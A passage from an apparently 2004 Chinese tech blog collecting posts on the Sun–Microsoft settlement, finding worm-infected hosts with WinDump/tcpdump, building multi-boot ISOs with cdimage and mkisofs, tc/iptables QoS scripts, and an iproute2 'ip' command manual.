SUN公司主席兼首席执行官斯科特-麦克尼声明中表示，微软与SUN公司的最终和解为双方进一步重大合作奠定了良好基础，与此同时，用户依然可以在微软和SUN之间自由选择。麦克尼补充说，微软和SUN的和解将刺激双方新产品的开发。另外，双方产品的计算环境能无缝衔接，为那些想从多个供应商集成服务器产品的客户提供了更多的选择余地。微软首席执行官史蒂夫-鲍尔默在声明中指出，微软和SUN公司的竞争将加剧，但双方的和解协议创造了一个对公司双方和客户都有利的合作基础。另外，声明还强调，微软将创建一个价值3.5亿美元的诚信基金，用于支付双方利用彼此的专利技术费用。Sun与微软同意相互向对方支付技术使用费，这些技术包括Java和.NET。微软预付3.5亿美元，Sun则会在将微软技术集成到其服务器产品之后支付相关费用。在与微软达成重要和解协议的同时，SUN还宣布了一项重要的人事变动，任命乔纳森-施瓦茨(Jonathan Schwartz)为公司的总裁兼首席运营官，麦克尼利则继续保留主席兼首席执行官头衔。 SUN公司将耗资4.75亿美元用于支付下几个季度裁员支出，据悉，此次裁员数量将达到3300个。 SUN公司预计第三财季收入26.5亿美元。华尔街预计SUN公司每股亏损6-8美分。（程新潮编译整理） More...

Posted by windtear at 10:12 AM

5000 与 100000 我爱网络

blog 访问突破 5000 次IPCN.org 访问突破 100000 次norton.ipcn.org 访问突破 100000 次 More...

Posted by windtear at 1:40 AM

挑战 Paper 凑数中文核心 我爱网络

内容1.有关计算机科学研究与应用方面的研究论文和研究报告2.在科学实验和现代化管理中，在计算机应用方面所取得的新进展、新成果、新技术，包括软、硬件开发，网络技术，工业设计，信号与信息处理，通信技术，多媒体技术等3.在计算机应用方面的简介、简报、经验交流须知1.工作成果为主，<6000字2.标题<20汉字(英文标题，姓名中文拼音），中英文摘要<200汉字，关键词中英文 3~8个3.A4纸 5号字单面打印4.勿一稿多投，3个月后，如无录用通知，可自行处理5.作者简介，身份证号，通讯地址，邮编，电话及E-Mail6.支持邮政与E-Mail投稿email：shiy@dsp.ac.cnphone：62554573-----> 案例分析TP-83 微计算机应用 1980 双月刊核心期刊案例分析：2004.1综述与研究 3网络与通信 7多媒体 3软件与硬件的应用与开发 14 More...

Posted by windtear at 1:21 AM

April 5, 2004

WinDump v.s. tcpdump - 挑战毒王 我爱网络

D:\>windump -hwindump version current-cvs.tcpdump.org, based on tcpdump version current-cvs.tcpdump.orgWinPcap version 3.0 alpha, based on libpcap version current-cvs.tcpdump.orgUsage: windump [-aAdDeflnNOpqRStuvxX] [-B size] [-c count] [ -C file_size ] [ -F file ] [ -i interface ] [ -r file ] [ -s snaplen ] [ -T type ] [ -w file ] [ -E algo:secret ] [ expression ]% tcpdump -htcpdump version 3.6.3libpcap version 0.6Usage: tcpdump [-adeflnNOpqRStuvxX] [-c count] [ -F file ] [ -i interface ] [ -r file ] [ -s snaplen ] [ -T type ] [ -U user ] [ -w file ] [ expression ]发信人: windtear (看成败人生豪迈), 信区: THUNet标题: [简易FAQ] 怎么知道谁中毒了发信站: BBS 水木清华站 (Sun Nov 2 21:22:21 2003), 转信[简易FAQ] 怎么知道谁中毒了Q: 怎么知道谁中毒了A：抓包Q: 怎么抓包A: WinDumpQ: 哪里有A: http://windump.polito.it/Q: 连不上A: 用代理或者 http://ipcn.org/windump/WinDump.exe http://ipcn.org/windump/WinPcap_3_0.exe (如果不想用 alpha 版本 http://ipcn.org/windump/WinDump.v3.6.2.exe http://ipcn.org/windump/2.3-WinPcap.exe )Q: 怎么用A: 先装 WinPcap_3_0.exe 再装 WinDump.exe 开始->运行 %SystemRoot% 拷贝粘贴 WinDump.exe 开始->运行 cmd WinDump.exe -hQ: 看不懂A: http://windump.polito.it/docs/manual.htm http://windump.polito.it/misc/faq.htmA: WinDump.exe -nn icmp21:06:50.845294 IP 166.111.168.203 > 166.111.169.255: icmp 72: echo request seq 1643621:06:51.023851 IP 166.111.168.203 > 166.111.170.17: icmp 72: echo request seq 2104421:06:51.063603 IP 166.111.168.203 > 166.111.170.21: icmp 72: echo request seq 2206821:06:51.133730 IP 166.111.168.203 > 166.111.170.28: icmp 72: echo request seq 2386021:06:51.163858 IP 166.111.168.203 > 166.111.170.31: icmp 72: echo request seq 24628Q: 谁中毒了A: 166.111.168.203Q: 我只想要 238 段的A: WinDump.exe -nn icmp and src net 166.111.238.0/24 Q: 怎么知道中毒的166.111.168.203是谁A: 如是静态IP：看静态IP分配信息如不是： ping 166.111.168.203 arp -a 找到 166.111.168.203 的 mac 166.111.168.203 00-50-ba-45-91-6f dynamic 00-50-ba-45-91-6fQ: 然后呢A: 到 3900(3300) 1100 查哪个端口A:--_--> 3900Address found on port 17: Canonical address Type 00-50-ba-45-91-6f Dynamicor ----> 3900www Success!Address found on port 17-----> 1100Location VLAN ID PermanentUnit 1 Port 12 1 NoQ: 不会A: 发信到 sns_noc@mails.tsinghua.edu.cn --http://ipcn.org/ ipchina.org proxy/ftp/domain/search/whois/BBS/XO/speed/mail/vpn 35#BBS (35# 从 2003-08-25 起为女研究生楼) telnet://bbs.35net.ipcn.org/ http://bbs.35net.ipcn.org/或者 telnet://ipcn.org/ telnet://ipchina.org/ 国内外均可访问提供穿梭个人文集等额外服务※ 来源:·BBS 水木清华站 smth.org·[FROM: 166.111.154.35]D:\>windump -n src net 166.111.168.0/22 and not src host 166.111.168.100D:\>WinDump.exe -n udp port 1434TCPDUMP(8) TCPDUMP(8)NAME tcpdump - dump traffic on a networkSYNOPSIS tcpdump [ -adeflnNOpqRStuvxX ] [ -c count ] [ -F file ] [ -i interface ] [ -m module ] [ -r file ] [ -s snaplen ] [ -T type ] [ -U user ] [ -w file ] [ -E algo:secret ] [ expression ]DESCRIPTION Tcpdump prints out the headers of packets on a network interface that match the boolean expression. Under SunOS with nit or bpf: To run tcpdump you must have read access to /dev/nit or /dev/bpf*. Under Solaris with dlpi: You must have read/write access to the network pseudo device, e.g. /dev/le. Under HP-UX with dlpi: You must be root or it must be installed setuid to root. Under IRIX with snoop: You must be root or it must be installed setuid to root. Under Linux: You must be root or it must be installed setuid to root. Under Ultrix and Digital UNIX: Once the super-user has enabled promiscuous- mode operation using pfconfig(8), any user may run tcp- dump. Under BSD: You must have read access to /dev/bpf*.OPTIONS -a Attempt to convert network and broadcast addresses to names. -c Exit after receiving count packets. -d Dump the compiled packet-matching code in a human readable form to standard output and stop. -dd Dump packet-matching code as a C program fragment. -ddd Dump packet-matching code as decimal numbers (pre- ceded with a count). -e Print the link-level header on each dump line. -E Use algo:secret for decrypting IPsec ESP packets. Algorithms may be des-cbc, 3des-cbc, blowfish-cbc, rc3-cbc, cast128-cbc, or none. The default is des- cbc. The ability to decrypt packets is only pre- sent if tcpdump was compiled with cryptography enabled. secret the ascii text for ESP secret key. We cannot take arbitrary binary value at this moment. The option assumes RFC2406 ESP, not RFC1827 ESP. The option is only for debugging pur- poses, and the use of this option with truly `secret' key is discouraged. By presenting IPsec secret key onto command line you make it visible to others, via ps(1) and other occasions. -f Print `foreign' internet addresses numerically rather than symbolically (this option is intended to get around serious brain damage in Sun's yp server -- usually it hangs forever translating non- local internet numbers). -F Use file as input for the filter expression. An additional expression given on the command line is ignored. -i Listen on interface. If unspecified, tcpdump searches the system interface list for the lowest numbered, configured up interface (excluding loop- back). Ties are broken by choosing the earliest match. On Linux systems with 2.2 or later kernels, an interface argument of ``any'' can be used to cap- ture packets from all interfaces. Note that cap- tures on the ``any'' device will not be done in promiscuous mode. -l Make stdout line buffered. Useful if you want to see the data while capturing it. E.g., ``tcpdump -l | tee dat'' or ``tcpdump -l > dat & tail -f dat''. -n Don't convert host addresses to names. This can be used to avoid DNS lookups. -nn Don't convert protocol and port numbers etc. to names either. -N Don't print domain name qualification of host names. E.g., if you give this flag then tcpdump will print ``nic'' instead of ``nic.ddn.mil''. -m Load SMI MIB module definitions from file module. This option can be used several times to load sev- eral MIB modules into tcpdump. -O Do not run the packet-matching code optimizer. This is useful only if you suspect a bug in the optimizer. -p Don't put the interface into promiscuous mode. Note that the interface might be in promiscuous mode for some other reason; hence, `-p' cannot be used as an abbreviation for `ether host {local-hw- addr} or ether broadcast'. -q Quick (quiet?) output. Print less protocol infor- mation so output lines are shorter. -r Read packets from file (which was created with the -w option). Standard input is used if file is ``-''. -R Assume ESP/AH packets to be based on old specifica- tion (RFC1825 to RFC1829). If specified, tcpdump will not print replay prevention field. Since there is no protocol version field in ESP/AH speci- fication, tcpdump cannot deduce the version of ESP/AH protocol. -s Snarf snaplen bytes of data from each packet rather than the default of 68 (with SunOS's NIT, the mini- mum is actually 96). 68 bytes is adequate for IP, ICMP, TCP and UDP but may truncate protocol infor- mation from name server and NFS packets (see below). Packets truncated because of a limited snapshot are indicated in the output with ``[|proto]'', where proto is the name of the protocol level at which the truncation has occurred. Note that taking larger snapshots both increases the amount of time it takes to process packets and, effectively, decreases the amount of packet buffering. This may cause packets to be lost. You should limit snaplen to the smallest number that will capture the protocol information you're interested in. Setting snaplen to 0 means use the required length to catch whole packets. -S Print absolute, rather than relative, TCP sequence numbers. -t Don't print a timestamp on each dump line. -tt Print an unformatted timestamp on each dump line. -ttt Print a delta (in micro-seconds) between current and previous line on each dump line. -tttt Print a timestamp in default format proceeded by date on each dump line. -U Drops root privileges and changes user ID to user and group ID to the primary group of user. Note! Red Hat Linux automatically drops the privi- leges to user ``pcap'' if nothing else is speci- fied. -T Force packets selected by "expression" to be inter- preted the specified type. Currently known types are cnfp (Cisco NetFlow protocol), rpc (Remote Pro- cedure Call), rtp (Real-Time Applications proto- col), rtcp (Real-Time Applications control proto- col), snmp (Simple Network Management Protocol), vat (Visual Audio Tool), and wb (distributed White Board). -u Print undecoded NFS handles. -v (Slightly more) verbose output. For example, the time to live, identification, total length and options in an IP packet are printed. Also enables additional packet integrity checks such as verify- ing the IP and ICMP header checksum. SMB packets are also printed in full. -vv Even more verbose output. For example, additional fields are printed from NFS reply packets. -vvv Even more verbose output. For example, telnet SB ... SE options are printed in full. With -X telnet options are printed in hex as well. -w Write the raw packets to file rather than parsing and printing them out. They can later be printed with the -r option. Standard output is used if file is ``-''. -x Print each packet (minus its link level header) in hex. The smaller of the entire packet or snaplen bytes will be printed. -X When printing hex, print ascii too. Thus if -x is also set, the packet is printed in hex/ascii. This is very handy for analysing new protocols. Even if -x is not also set, some parts of some packets may be printed in hex/ascii. expression selects which packets will be dumped. If no expression is given, all packets on the net will be dumped. Otherwise, only packets for which expres- sion is `true' will be dumped. The expression consists of one or more primitives. Primitives usually consist of an id (name or num- ber) preceded by one or more qualifiers. There are three different kinds of qualifier: type qualifiers say what kind of thing the id name or number refers to. Possible types are host, net and port. E.g., `host foo', `net 128.3', `port 20'. If there is no type qualifier, host is assumed. dir qualifiers specify a particular transfer direction to and/or from id. Possible directions are src, dst, src or dst and src and dst. E.g., `src foo', `dst net 128.3', `src or dst port ftp-data'. If there is no dir qualifier, src or dst is assumed. For `null' link layers (i.e. point to point pro- tocols such as slip) the inbound and out- bound qualifiers can be used to specify a desired direction. proto qualifiers restrict the match to a particu- lar protocol. Possible protos are: ether, fddi, tr, ip, ip6, arp, rarp, decnet, tcp and udp. E.g., `ether src foo', `arp net 128.3', `tcp port 21'. If there is no proto qualifier, all protocols consistent with the type are assumed. E.g., `src foo' means `(ip or arp or rarp) src foo' (except the latter is not legal syntax), `net bar' means `(ip or arp or rarp) net bar' and `port 53' means `(tcp or udp) port 53'. [`fddi' is actually an alias for `ether'; the parser treats them identically as meaning ``the data link level used on the specified network interface.'' FDDI headers contain Ethernet-like source and destination addresses, and often contain Ethernet-like packet types, so you can filter on these FDDI fields just as with the analogous Ether- net fields. FDDI headers also contain other fields, but you cannot name them explicitly in a filter expression. Similarly, `tr' is an alias for `ether'; the previ- ous paragraph's statements about FDDI headers also apply to Token Ring headers.] In addition to the above, there are some special `primitive' keywords that don't follow the pattern: gateway, broadcast, less, greater and arithmetic expressions. All of these are described below. More complex filter expressions are built up by using the words and, or and not to combine primitives. E.g., `host foo and not port ftp and not port ftp-data'. To save typing, identical qualifier lists can be omitted. E.g., `tcp dst port ftp or ftp-data or domain' is exactly the same as `tcp dst port ftp or tcp dst port ftp-data or tcp dst port domain'. Allowable primitives are: dst host host True if the IPv4/v6 destination field of the packet is host, which may be either an address or a name. src host host True if the IPv4/v6 source field of the packet is host. host host True if either the IPv4/v6 source or desti- nation of the packet is host. Any of the above host expressions can be prepended with the keywords, ip, arp, rarp, or ip6 as in: ip host host which is equivalent to: ether proto \ip and host host If host is a name with multiple IP addresses, each address will be checked for a match. ether dst ehost True if the ethernet destination address is ehost. Ehost may be either a name from /etc/ethers or a number (see ethers(3N) for numeric format). ether src ehost True if the ethernet source address is ehost. ether host ehost True if either the ethernet source or desti- nation address is ehost. gateway host True if the packet used host as a gateway. I.e., the ethernet source or destination address was host but neither the IP source nor the IP destination was host. Host must be a name and must be found in both /etc/hosts and /etc/ethers. (An equivalent expression is ether host ehost and not host host which can be used with either names or num- bers for host / ehost.) This syntax does not work in IPv6-enabled configuration at this moment. dst net net True if the IPv4/v6 destination address of the packet has a network number of net. Net may be either a name from /etc/networks or a network number (see networks(4) for details). src net net True if the IPv4/v6 source address of the packet has a network number of net. net net True if either the IPv4/v6 source or desti- nation address of the packet has a network number of net. net net mask mask True if the IP address matches net with the specific netmask. May be qualified with src or dst. Note that this syntax is not valid for IPv6 net. net net/len True if the IPv4/v6 address matches net a netmask len bits wide. May be qualified with src or dst. dst port port True if the packet is ip/tcp, ip/udp, ip6/tcp or ip6/udp and has a destination port value of port. The port can be a num- ber or a name used in /etc/services (see tcp(4P) and udp(4P)). If a name is used, both the port number and protocol are checked. If a number or ambiguous name is used, only the port number is checked (e.g., dst port 513 will print both tcp/login traf- fic and udp/who traffic, and port domain will print both tcp/domain and udp/domain traffic). src port port True if the packet has a source port value of port. port port True if either the source or destination port of the packet is port. Any of the above port expressions can be prepended with the keywords, tcp or udp, as in: tcp src port port which matches only tcp packets whose source port is port. less length True if the packet has a length less than or equal to length. This is equivalent to: len <= length. greater length True if the packet has a length greater than or equal to length. This is equivalent to: len >= length. ip proto protocol True if the packet is an IP packet (see ip(4P)) of protocol type protocol. Protocol can be a number or one of the names icmp, icmp6, igmp, igrp, pim, ah, esp, udp, or More...

Posted by windtear at 12:56 AM

cdimage v.s. mkisofs (+gbk+md5) - 挑战多启动ISO 我爱网络

cdimage - the internal ISO tool of Microsoft-----> democdimage -lWindows01 -d -h -n -o -m -bloader.bin F:\ISO-n-in-1\2000_tree e:\windows01.v0.003.iso-----> autorun.inf[AutoRun]icon=autorun.icoopen=autorun.exe-----> cdimage usageCDIMAGE 2.39 CD-ROM Premastering UtilityCopyright (C) Microsoft, 1993-1997. All rights reserved.For Microsoft internal use only.Usage: CDIMAGE [options] sourceroot targetfile -l volume label, no spaces (e.g. -lMYLABEL) -t time stamp for all files and directories, no spaces, any delimiter (e.g. -t12/31/91,15:01:00) -g encode GMT time for files rather than local time -h include hidden files and directories -n allow long filenames (longer than DOS 8.3 names) -nt allow long filenames, restricted to NT 3.51 compatibility (-nt and -d cannot be used together) -d don't force lowercase filenames to uppercase -c use ANSI filenames versus OEM filenames from source -j1 encode Joliet Unicode filenames AND generate DOS-compatible 8.3 filenames in the ISO-9660 name space (can be read by either Joliet systems or conventional ISO-9660 systems, but some of the filenames in the ISO-9660 name space might be changed to comply with DOS 8.3 and/or ISO-9660 naming restrictions) -j2 encode Joliet Unicode filenames without standard ISO-9660 names (requires a Joliet operating system to read files from the CD) When using the -j1 or -j2 options, the -n, -nt, and -d options do not apply and cannot be used. -js non-Joliet "readme.txt" file for images encoded with -j2 option (e.g. -jsc:\location\readme.txt). This file will be visible as the only file in the root directory of the disc on systems that do not support the Joliet format (Windows 3.1, NT 3.x, etc). -u1 encode "UDF" file system along with mirror ISO-9660 file system (-n, -nt, -d, -c, or -j1, -j2 options apply to ISO-9660 portion) -u2 encode "UDF" file system without a mirror ISO-9660 file system (requires a UDF capable operating system to read the files) -us non-UDF "readme.txt" file for images encoded with -u2 option (e.g. -usc:\location\readme.txt). This file will be visible as the only file in the root directory of the disc on systems that do not support the UDF format. -b "El Torito" boot sector file, no spaces (e.g. -bc:\location\cdboot.bin) -s sign image file with digital signature (no spaces, provide RPC server and endpoint name like -sServerName:EndPointName) -x compute and encode "AutoCRC" values in image -o optimize storage by encoding duplicate files only once -oc slower duplicate file detection using binary comparisons rather than MD5 hash values -oi ignore diamond compression timestamps when comparing files -os show duplicate files while creating image (-o options can be combined like -ocis) -w warning level followed by number (e.g. -w4) 1 report non-ISO or non-Joliet compliant filenames or depth 2 report non-DOS compliant filenames 3 report zero-length files 4 report each file name copied to image -y test option followed by number (e.g. -y1), used to generate non-standard variations of ISO-9660 for testing purposes: 1 encode trailing version number ';1' on filenames (7.5.1) 2 round directory sizes to multiples of 2K (6.8.1.3) 5 write \i386 directory files first, in reverse sort order 6 allow directory records to be exactly aligned at ends of sectors (ISO-9660 6.8.1.1 conformant but breaks MSCDEX) 7 warn about generated shortnames for 16-bit apps under NT 4.0 b blocksize 512 bytes rather than 2048 bytes d suppress warning for non-identical files with same initial 64K -k (keep) create image even if fail to open some of the source files -m ignore maximum image size of 681,984,000 bytes -a allocation summary shows file and directory sizes -q scan source files only, don't create an image file NOTE: Many of these options allow you to create CD images that are NOT compliant with ISO-9660 and may also NOT be compatibile with one or more operating systems. If you want strict ISO and DOS compliance, use the -w2 warning level and correct any discrepencies reported. YOU are responsible for insuring that any generated CDs are compatible with all appropriate operating systems. Also note that Microsoft company information is placed in the image volume header, so don't use this program to generate CDs for companies other than Microsoft.-----> mkisofs by ClearMind @ Thu Oct 11 18:18:43 2001光盘基本刻录支持和基本命令==========================1. mkisofs的使用mkisofs -b images/boot.img -c boot.cat -J -r -T \ -p "光盘标识号" -P "光盘制作人" -A "长光盘标识号" -V "短光盘标识号" \ . -o 光盘映象ISO2. cdrecord刻录cdrecord -v -dev=刻录机设备 -speed=刻录速度 -eject -fs=4m -data 光盘映象ISO3. 多启动光盘映象光盘(multi-boot-image bootable CDROM)的制作mkisofs -J -r -T -R -relaxed-filenames -c boot.cat \ -p "光盘标识号" -P "光盘制作人" -A "长光盘标识号" -V "短光盘标识号" \ -b image1.img -eltorito-alt-boot \ -b image2.img -eltorito-alt-boot \ -b image3.img -eltorito-alt-boot \ -b image4.img -eltorito-alt-boot \ -hide-rr-moved -max-iso9660-filenames \ -o 光盘映象ISO 光盘内容目录/-----> mkisofs win32 GBK md5 by Wwashington @ NewSoftware-7-11它比微软的 CDImage 多了 Unix RockRidge 和 Apple HFS 格式的支持。在制作系统安装与维护光盘的时候，它可以发挥出超乎想象的巨大作用。当我们采用 RockRidge 格式来做 ISO 的时候，最典型的应用例子就是支持硬盘配置(linux fdisk).再利用 DiskEmu 增加一项 NT/2K 密码的恢复(Bd011022.ima)，就是很强的 Rescue Cdrom 了。使用前必须把你做好的 ISO 镜象用刻录工具写到光盘里。下载后请仔细阅读说明文件。...基于 RockRidge+GBK+MD5 的 MultiBoot+Multi Windows Xp+NTPwd+Mandrake Rescue 光盘 ISO...好处太大了，cdimage -o 如果要做 3 Xp 合一的话，需要大约2G 的实际空间，做完后再删重复链接，很土。而 mkisofs -O则是扫描目录结构就用 MD5 判断文件链接，也就是说做多少个Xp 合一都好，最后优化出来需要大多空间工作过程就需要多大。关于这一点，是 COMMAN 完成的，你去感谢他吧，偶只管 MD5。Product: mkisofs 1.15a23 +gbk +md5 (DEBUG version)Author : Wwashington @ SMTH , Release: 2002/06/14[推荐] mkisofs win32 GBK 版-V1.15a23 @ Wed May 29 04:40:58 2002[公告] mkisofs 1.15a23 +gbk +md5 完成 @ Thu May 30 20:08:54 2002[总结] mkisofs +gbk +md5 howto @ Sat Jun 1 05:53:09 2002[注意] ISO Maker 1.22 build 11 发布 @ Mon Jun 10 17:20:38 2002[大好消息] 超酷 mkisofs 的 md5 优化搞定 @ Fri Jun 14 11:16:07 2002[测试版本] 超酷 mkisofs 的 md5 优化搞定 @ Fri Jun 14 20:16:11 2002---------------------------------------------------------------------------------/*********** Howto build the latest mkisofs with gbk and md5 support ***********//************ Written by Wwashington in www.smth.edu.cn, 2002/06/01 ************/---------------------------------------------------------------------------------[A] File List.(1) Type = Full Sources. What = The original files from joerg.schilling (A great man). Link = http://natural.chonnam.ac.kr/linux/mkisofs/mkisofs-1.12b5.tar.gz Link = ftp://ftp.fokus.gmd.de/pub/unix/cdrecord/alpha/cdrtools-1.11a23.tar.gz(2) Type = Full Sources. What = v1.12b5, The 1st GBK made by dfbb, and 2nd Md5 made by COMMAN, Link = http://wwashington.51.net/files/friend/mkisofs/mkisofs-1.12b5.rar(3) Type = Full Sources + Patches + Tools. What = v1.15a23, The 1st GBK made by Wwashington (learn from dfbb) Link = http://www.mesky.net/SoftDown/SoftView.Asp?SoftID=1271(4) Type = Patches + Documents. What = v1.12b5, The 1st GBK patch by dfbb, and 2nd Md5 patch by COMMAN, What = v1.15a23, The 1st & 2nd patches by Wwashington, (learn from dfbb & COMMAN, add 2 new features, fix a GBK bug which forces lowercase.) Link = http://wwashington.51.net/files/myprod/mkisofs/mkisofs-gbk.md5.rar(5) Type = Binary + Shell Program. (by Wwashington) What = ISO Maker 1.20 b10 including mkisofs 1.15a23 +gbk +md5 Link = http://www.mesky.net/SoftDown/SoftView.Asp?SoftID=1280(6) Type = Folders Introduction. (100% working, need to upgrade step by step) What = 1.12.b5_gbk, 1.12.b5_md5, 1.15.a23_gbk, 1.15.a23_md5 Doc1 = Original --> 1.12.b5_gbk --> 1.12.b5_md5 Doc2 = Original --> 1.15.a23_gbk --> 1.15.a23_md5 Fix1 = 1.12 old --> 1.12 gbk (dfbb) --> 1.12 md5 (COMMAN) Fix2 = 1.15 old --> 1.15 gbk (wwashington) --> 1.15 md5 (wwashington) ---------------------------------------------------------------------------------[B] Some Tips.(1) Type = Preparation What = Install Cygwin to compile gnu win32 program. Link = http://www.cygwin.com Link = http://www.mesky.net/SoftDown/SoftView.Asp?SoftID=1270(2) Type = Preparation What = Install smake for better compiling performance. Link = ftp://ftp.fokus.gmd.de/pub/unix/smake/alpha/smake-1.2a16.tar.gz Link = http://www.mesky.net/SoftDown/SoftView.Asp?SoftID=1271 (binary)(3) Type = Compiling What = mkisofs 1.12b5 Help = As Below. 1> tar -zxvf *.*gz 2> cd mkisofs-1.12b5 3> ./configure 4> make (notes: smake also OK, make fit old format) 5> make clean 6> cp ?? . (notes: copy patches to mkisofs, old->gbk) 7> make (notes: then you can see the exe result) 8> .... (notes: do step 5 to 7 again, gbk->md5)(4) Type = Compiling What = mkisofs 1.15a23 Help = As Below. 1> tar -zxvf *.*gz (winzip or winrar will lose filelink) 2> cd cdrtools-1.11 (mkisofs1.15 is inside cdrtools1.11) 3> smake (notes: make can also work but not reliable) 4> cd mkisofs 5> smake clean 6> cp ?? . (notes: copy patches to mkisofs, old->gbk) 7> smake (notes: then you can see the exe result) 8> .... (notes: do step 5 to 7 again, gbk->md5) More...

Posted by windtear at 12:38 AM

April 4, 2004

6. tc sample - iproute2 - the most powerful tool 我爱网络

% tail rc.local.# qos cbq trafic controlsh _iptables.shsh _qos.sh -----> sample 1% cat _iptables.sh #!/bin/shIPTABLES=/sbin/iptables$IPTABLES -F OUTPUT -t mangle$IPTABLES -A OUTPUT -t mangle -p tcp --sport 1020 -j MARK --set-mark 1$IPTABLES -A OUTPUT -t mangle -p tcp --sport 10000:11000 -j MARK --set-mark 1$IPTABLES -A OUTPUT -t mangle --match owner --uid-owner 500 -j MARK --set-mark 2% cat _qos.sh#!/bin/shTC=/sbin/tc#$TC qdisc add dev eth0 root handle 1: cbq bandwidth 100Mbit allot 1514 cell 8 avpkt 1000 mpu 64#$TC class add dev eth0 parent 1:0 classid 1:1 cbq bandwidth 5Mbit rate 5Mbit allot 1514 weight 50Kbit prio 8 maxburst 20 avpkt 1000 bounded#$TC filter add dev eth0 protocol ip prio 3 handle 1 fw classid 1:1$TC qdisc add dev eth0 root handle 100: cbq bandwidth 10Mbit avpkt 1000$TC class add dev eth0 parent 100:0 classid 100:1 cbq bandwidth 10Mbit rate 5Mbit allot 1514 weight 5Mbit prio 8 maxburst 20 avpkt 1000$TC class add dev eth0 parent 100:1 classid 100:11 cbq bandwidth 10Mbit rate 4Mbit allot 1514 weight 4Mbit prio 5 maxburst 20 avpkt 1000 bounded$TC class add dev eth0 parent 100:1 classid 100:21 cbq bandwidth 10Mbit rate 1Mbit allot 1514 weight 1Mbit prio 5 maxburst 20 avpkt 1000 bounded$TC qdisc add dev eth0 parent 100:11 sfq quantum 1514b perturb 15$TC qdisc add dev eth0 parent 100:21 sfq quantum 1514b perturb 15$TC filter add dev eth0 protocol ip prio 25 handle 1 fw classid 100:11$TC filter add dev eth0 protocol ip prio 25 handle 2 fw classid 100:21#$TC filter add dev eth0 parent 100:0 protocol ip prio 100 u32 match ip src 166.111.Local.Host/32 port 20 flowid 100:10-----> sample 2% cat _iptables.sh #!/bin/shIPTABLES=/sbin/iptables$IPTABLES -F OUTPUT -t mangle$IPTABLES -A OUTPUT -t mangle -p tcp --sport TH_PO -j MARK --set-mark 1$IPTABLES -A OUTPUT -t mangle -p tcp --sport OU_PO -j MARK --set-mark 2$IPTABLES -A OUTPUT -t mangle -p tcp --sport TH_PAS:TH_PAE -j MARK --set-mark 1$IPTABLES -A OUTPUT -t mangle -p tcp --sport OU_PAS:OU_PAE -j MARK --set-mark 2% cat _qos.sh #!/bin/shTC=/sbin/tc#$TC qdisc add dev eth0 root handle 1: cbq bandwidth 100Mbit allot 1514 cell 8 avpkt 1000 mpu 64$TC qdisc add dev eth0 root handle 1: cbq bandwidth 100Mbit avpkt 1000$TC class add dev eth0 parent 1:0 classid 1:1 cbq bandwidth 100Mbit rate 100Mbit allot 1514 weight 10Mbit prio 8 maxburst 20 avpkt 1000$TC class add dev eth0 parent 1:1 classid 1:11 cbq bandwidth 100Mbit rate 70Mbit allot 1514 weight 7Mbit prio 5 maxburst 20 avpkt 1000 bounded$TC class add dev eth0 parent 1:1 classid 1:21 cbq bandwidth 100Mbit rate 10Mbit allot 1514 weight 1Mbit prio 5 maxburst 20 avpkt 1000 bounded$TC qdisc add dev eth0 parent 1:11 sfq quantum 1514b perturb 15$TC qdisc add dev eth0 parent 1:21 sfq quantum 1514b perturb 15$TC filter add dev eth0 protocol ip prio 25 handle 1 fw classid 1:11$TC filter add dev eth0 protocol ip prio 25 handle 2 fw classid 1:21 More...

Posted by windtear at 1:53 AM

5. ip usage 4 - iproute2 - the most powerful tool - [FWD] ip命令手册(四) 我爱网络

发信人: CrazyKid (疯狂小子※爱学习/爱生活), 信区: Linux 标题: [FWD] ip命令手册(四)发信站: BBS 水木清华站 (Fri Nov 15 18:13:00 2002), 站内http://www.linuxaid.com.cn/articles/1/2/123273063.shtmlip命令手册(四)摘要这一部分是关于多播路由和通道的内容，以及策略路由的一些相关内容。(2002-11-12 17:04:44)--------------------------------------------------------------------------------By nixe0n10.ip mroute -- 多播路由缓存管理10.1.缩写 mroute、mr10.2.对象这个命令的操作对象是多播路由缓存条目，这个缓存是由一个用户空间的多播路由监控进程(例如pimd或者mrouted)建立的。目前，由于受和多播路由引擎接口的限制，还不能通过ip命令修改多播路由对象，因此我们只能查看。10.3.命令 show或者list10.4.ip mroute show -- 列出多播路由缓存条目缩写：show、list、sh、ls、l参数to PREFIX(default) 选择到目的多播地址是PREFIX iif NAME 接收多播数据包的网络接口 from PREFIX PREFIX选择多播路由的IP源地址输出格式kuznet@amber:~ $ ip mroute ls(193.232.127.6, 224.0.1.39) Iif: unresolved (193.232.244.34, 224.0.1.40) Iif: unresolved (193.233.7.65, 224.66.66.66) Iif: eth0 Oifs: pimreg kuznet@amber:~ $ 多播路由缓存条目是(S,G)形式的，S是源地址，G是多播组。iif是接收多播数据包的网络接口，如果设备名是关键词unresolved，就表示路由监控进程不能解析这个条目；接下来的关键词是oif，它后面跟着一些输出网络接口，接口之间用空格分开。统计信息使用-statistics选项，我们可以得到更为详细的输出信息，包括：数据包的数量，通过这条路由转发的字节数以及到达错误接口的数据包数量(如果有)。kuznet@amber:~ $ ip -s mr ls 224.66/16(193.233.7.65, 224.66.66.66) Iif: eth0 Oifs: pimreg 9383 packets, 300256 byteskuznet@amber:~ $ 11.ip tunnel -- 通道配置11.1.缩写 tunnel、tunl11.2.对象 ip tunnel命令的操作对象是网络通道(tunnel)。所谓通道(tunnel)是指把数据包封装到IPv4数据包中，使用IP协议发出。有关通道的更多信息，请参考iproute的文档Tunnels over IP in Linux-2.2。11.3.命令 add、delete、change、show或者list11.4.ip tunnel add -- 添加新的通道ip tunnel change -- 修改现有的通道ip tunnel delete -- 删除一个通道缩写：add、a；change、chg；delete、del、d参数name NAME(default) 选择通道设备名 mode MODE 设置通道模式。有效的模式包括：ipip、sit和gre。 remote ADDRESS 设置通道远端地址 local ADDRESS 设置进入通道数据包的固定本地地址，必须是在本机另外一个接口上的地址。 ttl N 设置进入通道数据包的TTL为N。N是一个1—255之间的数字。0是一个特殊的值，表示这个数据包的TTL值是继承(inherit)的。ttl参数的缺省值是：inherit。 tos T或者dsfield T 设置进入通道数据包的TOS域，缺省是inherit。 dev NAME 把通道绑定到设备NAME，以便进入通道的数据包只能通过NAME设备路由，并且当对端发生变化时，不能够在另外的设备解开封装。 nopmtudisc 在这个通道上禁止路径最大传输单元发现( Path MTU Discovery)。默认情况下，这个功能是打开的。注意：这个选项和固定的ttl是不兼容的，如果使用了固定的ttl参数，系统会打开路径最大传输单元发现( Path MTU Discovery)功能。 key k,ikey k,okey k 只适用于GRE通道，设置keyed GRE通道的key。K或者是一个数字或者是IP地址形式的数字序列。参数key在通道的双向使用，ikey和okey为输入和输出设置不同的key。 csum,icsum,ocsum 